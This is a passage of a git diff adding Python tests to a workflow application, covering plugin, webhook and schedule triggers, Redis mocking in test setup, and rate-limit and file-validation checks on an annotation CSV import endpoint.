[] + dispatched_payloads: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": mock_plugin_subscription.tenant_id, + "endpoint_id": _endpoint_id, + "provider_id": mock_plugin_subscription.provider_id, + "subscription_id": mock_plugin_subscription.id, + "timestamp": int(time.time()), + "events": ["created", "updated"], + "request_id": f"req-{_endpoint_id}", + } + trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + 
) + + monkeypatch.setattr( + trigger_processing_tasks.TriggerDebugEventBus, + "dispatch", + staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1), + ) + + def _fake_delay(dispatch_data: dict[str, Any]) -> None: + dispatched_payloads.append(dispatch_data) + trigger_processing_tasks.dispatch_trigger_debug_event( + events=dispatch_data["events"], + user_id=dispatch_data["user_id"], + timestamp=dispatch_data["timestamp"], + request_id=dispatch_data["request_id"], + subscription=mock_plugin_subscription, + ) + + monkeypatch.setattr( + trigger_processing_tasks.dispatch_triggered_workflows_async, + "delay", + staticmethod(_fake_delay), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"}) + + assert response.status_code == 202 + assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload" + assert debug_events, "Plugin trigger should dispatch debug events" + dispatched_event_names = {event["event"].name for event in debug_events} + assert dispatched_event_names == {"created", "updated"} + + +def test_webhook_debug_dispatches_event( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Webhook single-step debug should dispatch debug event and be pollable.""" + tenant, account = tenant_and_account + webhook_node_id = "webhook-debug-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + 
app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_DEBUG, + created_by=account.id, + ) + db_session_with_containers.add(webhook_trigger) + db_session_with_containers.commit() + + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + monkeypatch.setattr( + "controllers.trigger.webhook.TriggerDebugEventBus.dispatch", + lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1], + ) + + # Listener polls first to enter waiting pool + poller = WebhookTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=draft_workflow.get_node_config_by_id(webhook_node_id), + node_id=webhook_node_id, + ) + assert poller.poll() is None + + response = test_client_with_containers.post( + f"/triggers/webhook-debug/{webhook_trigger.webhook_id}", + json={"foo": "bar"}, + headers={"Content-Type": "application/json"}, + ) + + assert response.status_code == 200 + assert debug_events, "Debug event should be sent to event bus" + # Second poll should get the event + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar" + assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}") + + +def test_plugin_single_step_debug_flow( + flask_app_with_containers: Flask, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables.""" + tenant_id = "tenant-1" + app_id = "app-1" + user_id = "user-1" + node_id = "plugin-node" + provider_id = "langgenius/provider-1/provider-1" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "plugin-1", + "plugin_unique_identifier": "plugin-1", + "provider_id": provider_id, + "event_name": "created", + "subscription_id": "sub-1", + "parameters": {}, + }, + } + # Start listening + 
poller = PluginTriggerDebugEventPoller( + tenant_id=tenant_id, + user_id=user_id, + app_id=app_id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None + + from core.trigger.debug.events import build_plugin_pool_key + + pool_key = build_plugin_pool_key( + tenant_id=tenant_id, + provider_id=provider_id, + subscription_id="sub-1", + name="created", + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant_id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id=user_id, + name="created", + request_id="req-1", + subscription_id="sub-1", + provider_id="provider-1", + ), + pool_key=pool_key, + ) + + from core.plugin.entities.request import TriggerInvokeEventResponse + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"echo": "pong"}, + cancelled=False, + ) + ), + ) + + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["echo"] == "pong" + + +def test_schedule_trigger_creates_trigger_log( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Schedule trigger execution should create WorkflowTriggerLog in database.""" + from tasks import workflow_schedule_tasks + + tenant, account = tenant_and_account + + # Create published workflow with schedule trigger node + schedule_node_id = "schedule-node" + graph = { + "nodes": [ + { + "id": schedule_node_id, + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "title": "schedule", + "mode": "cron", + "cron_expression": "0 9 * * *", + "timezone": "UTC", + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + 
type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create schedule plan + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=schedule_node_id, + tenant_id=tenant.id, + cron_expression="0 9 * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=schedule_node_id, + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title="schedule", + ) + db_session_with_containers.add_all([plan, app_trigger]) + db_session_with_containers.commit() + + # Mock AsyncWorkflowService to create WorkflowTriggerLog + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=published_workflow.id, + root_node_id=trigger_data.root_node_id, + trigger_metadata="{}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="schedule_executor", + celery_task_id="celery-schedule-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + workflow_schedule_tasks.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + # Mock quota to avoid rate limiting + from 
enums import quota_type + + monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited()) + + # Execute schedule trigger + workflow_schedule_tasks.run_schedule_trigger(plan.id) + + # Verify WorkflowTriggerLog was created + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Schedule trigger should create WorkflowTriggerLog" + assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE + assert logs[0].root_node_id == schedule_node_id + + +@pytest.mark.parametrize( + ("mode", "frequency", "visual_config", "cron_expression", "expected_cron"), + [ + # Visual mode: hourly + ("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"), + # Visual mode: daily + ("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"), + # Visual mode: weekly + ("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"), + # Visual mode: monthly + ("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"), + # Cron mode: direct expression + ("cron", None, None, "*/5 * * * *", "*/5 * * * *"), + ], +) +def test_schedule_visual_cron_conversion( + mode: str, + frequency: str | None, + visual_config: dict[str, Any] | None, + cron_expression: str | None, + expected_cron: str, +) -> None: + """Schedule visual config should correctly convert to cron expression.""" + + node_config: dict[str, Any] = { + "id": "schedule-node", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": mode, + "timezone": "UTC", + }, + } + + if mode == "visual": + node_config["data"]["frequency"] = frequency + node_config["data"]["visual_config"] = visual_config + else: + node_config["data"]["cron_expression"] = cron_expression + + config = ScheduleService.to_schedule_config(node_config) + + assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got 
{config.cron_expression}" + assert config.timezone == "UTC" + assert config.node_id == "schedule-node" + + +def test_plugin_trigger_full_chain_with_db_verification( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records.""" + + tenant, account = tenant_and_account + + # Create published workflow with plugin trigger node + plugin_node_id = "plugin-trigger-node" + provider_id = "langgenius/test-provider/test-provider" + subscription_id = "sub-plugin-test" + endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + graph = { + "nodes": [ + { + "id": plugin_node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "test-plugin", + "plugin_unique_identifier": "test-plugin", + "provider_id": provider_id, + "event_name": "test_event", + "subscription_id": subscription_id, + "parameters": {}, + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create trigger subscription + subscription = TriggerSubscription( + name="test-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "test-secret"}, + 
credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Update subscription_id to match the created subscription + graph["nodes"][0]["data"]["subscription_id"] = subscription.id + published_workflow.graph = json.dumps(graph) + db_session_with_containers.commit() + + # Create WorkflowPluginTrigger + plugin_trigger = WorkflowPluginTrigger( + app_id=app_model.id, + tenant_id=tenant.id, + node_id=plugin_node_id, + provider_id=provider_id, + event_name="test_event", + subscription_id=subscription.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=plugin_node_id, + trigger_type=AppTriggerType.TRIGGER_PLUGIN, + status=AppTriggerStatus.ENABLED, + title="plugin", + ) + db_session_with_containers.add_all([plugin_trigger, app_trigger]) + db_session_with_containers.commit() + + # Track dispatched data + dispatched_data: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": tenant.id, + "endpoint_id": _endpoint_id, + "provider_id": provider_id, + "subscription_id": subscription.id, + "timestamp": int(time.time()), + "events": ["test_event"], + "request_id": f"req-{_endpoint_id}", + } + dispatched_data.append(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"}) + + assert response.status_code == 202 + assert dispatched_data, "Plugin trigger should dispatch event data" + assert dispatched_data[0]["subscription_id"] == subscription.id + assert dispatched_data[0]["events"] == ["test_event"] + + # Verify database records exist + db_session_with_containers.expire_all() + plugin_triggers = ( + 
db_session_with_containers.query(WorkflowPluginTrigger) + .filter_by(app_id=app_model.id, node_id=plugin_node_id) + .all() + ) + assert plugin_triggers, "WorkflowPluginTrigger record should exist" + assert plugin_triggers[0].provider_id == provider_id + assert plugin_triggers[0].event_name == "test_event" + + +def test_plugin_debug_via_http_endpoint( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable.""" + + tenant, account = tenant_and_account + + provider_id = "langgenius/debug-provider/debug-provider" + endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + event_name = "debug_event" + + # Create subscription + subscription = TriggerSubscription( + name="debug-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "debug-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Create plugin trigger node config + node_id = "plugin-debug-node" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin-debug", + "plugin_id": "debug-plugin", + "plugin_unique_identifier": "debug-plugin", + "provider_id": provider_id, + "event_name": event_name, + "subscription_id": subscription.id, + "parameters": {}, + }, + } + + # Start listening with poller + + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None, "First poll should return None (waiting)" + + # Track debug events dispatched + debug_events: list[dict[str, Any]] = [] + original_dispatch = 
TriggerDebugEventBus.dispatch + + def _tracking_dispatch(**kwargs: Any) -> int: + debug_events.append(kwargs) + return original_dispatch(**kwargs) + + monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch)) + + # Mock process_endpoint to trigger debug event dispatch + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + # Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async + pool_key = build_plugin_pool_key( + tenant_id=tenant.id, + provider_id=provider_id, + subscription_id=subscription.id, + name=event_name, + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant.id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id="end-user", + name=event_name, + request_id=f"req-{_endpoint_id}", + subscription_id=subscription.id, + provider_id=provider_id, + ), + pool_key=pool_key, + ) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + # Call HTTP endpoint + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"}) + + assert response.status_code == 202 + assert debug_events, "Debug event should be dispatched via HTTP endpoint" + assert debug_events[0]["event"].name == event_name + + # Mock invoke_trigger_event for poller + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"http_debug": "success"}, + cancelled=False, + ) + ), + ) + + # Second poll should receive the event + event = poller.poll() + assert event is not None, "Poller should receive debug event after HTTP trigger" + assert event.workflow_args["inputs"]["http_debug"] == "success" diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- 
a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def _patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + 
dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..06a7b98baf --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,347 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from pandas.errors import ParserError +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, 
mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = 
dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in 
integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from 
services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + 
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert 
dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class 
